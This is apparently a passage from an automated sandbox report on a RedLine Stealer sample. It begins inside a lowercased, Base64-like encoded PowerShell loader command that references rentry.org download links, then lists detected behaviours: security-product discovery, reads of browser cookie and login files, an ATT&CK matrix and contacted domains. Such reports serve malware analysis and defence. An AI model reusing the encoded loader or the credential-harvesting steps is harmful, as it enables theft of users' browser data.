rac4aaabyaguazgagac0abqbhahqaywboacaaigbeaggadab0ahaacwa/adoalwavaciakqagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahiazqb0ahuacgbuacaajabsagkabgbrac4aaabyaguazganaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaaiaagacaaiablagwacwblacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaacgblahqadqbyag4aiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauafuacgbpacgakaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbvahiaaqagacqacgblahmacabvag4acwblac4aqgbhahmazqbsaguacwbwag8abgbzagualgbsaguacwbwag8abgbzaguavqbyagkakqasacaajabsagkabgbrac4aaabyaguazgapackalgbbagiacwbvagwadqb0aguavqbyagkadqakacaaiaagacaaiaagacaaiab9aa0acgagacaaiaagah0adqakacaaiaagacaazqbsahmazqagahsadqakacaaiaagacaaiaagacaaiabyaguadab1ahiabgagacqabgb1agwabaanaaoaiaagacaaiab9aa0acgb9aa0acganaaoajabwageazwbladeaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwbhadeamwaxadmaoaa4aduanwa5agqamabdageayqa4adyamgbkadqarqbfadaaiganaaoajabwageazwbladiaiaa9acaaigboahqadabwahmaogavac8acgblag4adabyahkalgbvahiazwavadaaeabmadyarqbbadcaygbgaduazaawadgaoqbgadqamwa5aeuaywa2aguanwawadeamaaxadaamqbhadgaoaa1adcaoqbkadaaqwbhageaoaa2adiazaa0aeuarqawaciadqakacqacwblahyazqbuafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamqanaaoajabtageabgbhagcazqbyafoaaqbwafuacgbsacaapqagaecazqb0ac0awgbpahaatabpag4aawbgahiabwbtafaayqbnaguaiaakahaayqbnaguamganaaoaaqbmacaakaatag4abwb0acaajabzaguadgblag4awgbpahaavqbyagwakqagahsaiabyaguadab1ahiabgagah0adqakagkazgagacgalqbuag8adaagacqabqbhag4ayqbnaguacgbaagkacabvahiabaapacaaewagahiazqb0ahuacgbuacaafqanaaoadqakacqacwblahyazqbuafoaaqbwafoaaqbwafaayqb0aggaiaa9acaasgbvagkabgatafaayqb0aggaiaakaguabgb2adoavabfae0auaagacianwb6adeaoqawadaalqb4adyanaauahoaaqbwaciadqakacqacwblahyazqbuafoaaqbwaeuaeab0ahiayqbjahqauabhahqaaaagad0aiabkag8aaqbuac0auabhahqaaaagacqazqbuahyaogbuaeuatqbqacaaiga3ahoaaqbwaciadqakaekaJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013D9C20 cpuid 0_2_00007FF7013D9C20
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: GetLocaleInfoW,11_2_00C60AC0
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: GetLocaleInfoW,11_2_00C60B0C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00C4AD34
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,11_2_00C4B8AC
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: GetLocaleInfoA,11_2_01630E53
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: GetKeyboardLayout,GetLocaleInfoA,11_2_016216F2
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013C8B40 GetSystemTimeAsFileTime,0_2_00007FF7013C8B40
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_009C7610 GetVersion,GetModuleHandleW,GetProcAddress,9_2_009C7610
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected RedLine Stealer
                            Source: Yara matchFile source: 20.2.MSBuild.exe.1000000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.cmd.exe.2da00c8.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.cmd.exe.59500c8.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000C.00000002.1808293565.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.2068807549.0000000002DA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2070765448.0000000001002000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1464, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2800, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 4224, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\vpdcuvm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                            Windows Management Instrumentation                            		11
                            DLL Side-Loading                            		1
                            Abuse Elevation Control Mechanism                            		1
                            Disable or Modify Tools                            		1
                            OS Credential Dumping                            		1
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		1
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            DLL Side-Loading                            		11
                            Deobfuscate/Decode Files or Information                            		1
                            Input Capture                            		3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Data from Local System                            		21
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts12
                            Command and Scripting Interpreter                            		Logon Script (Windows)1
                            Access Token Manipulation                            		1
                            Abuse Elevation Control Mechanism                            		Security Account Manager237
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		11
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            PowerShell                            		Login Hook211
                            Process Injection                            		4
                            Obfuscated Files or Information                            		NTDS441
                            Security Software Discovery                            		Distributed Component Object Model3
                            Clipboard Data                            		2
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                            Software Packing                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging13
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                            DLL Side-Loading                            		Cached Domain Credentials241
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                            Masquerading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
                            Virtualization/Sandbox Evasion                            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Access Token Manipulation                            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron211
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                            Hidden Files and Directories                            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634350 Sample: zkwindow.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 64 rentry.org 2->64 66 pki-goog.l.google.com 2->66 68 3 other IPs or domains 2->68 88 Suricata IDS alerts for network traffic 2->88 90 Malicious sample detected (through community Yara rule) 2->90 92 Antivirus detection for URL or domain 2->92 94 10 other signatures 2->94 10 zkwindow.exe 2->10         started        12 AUpdate.exe 2 2->12         started        signatures3 process4 signatures5 15 powershell.exe 14 32 10->15         started        116 Maps a DLL or memory area into another process 12->116 118 Found direct / indirect Syscall (likely to bypass EDR) 12->118 20 cmd.exe 2 12->20         started        process6 dnsIp7 72 rentry.org 164.132.58.105, 443, 49715, 49717 OVHFR France 15->72 74 main-connection.click 188.114.97.3, 443, 49718, 49724 CLOUDFLARENETUS European Union 15->74 46 C:\Users\user\AppData\Local\Temp\...\7za.exe, PE32+ 15->46 dropped 48 C:\Users\...\fe387de893ce4f2ca49f16029d364dc1, Zip 15->48 dropped 76 Obfuscated command line found 15->76 78 Hides that the 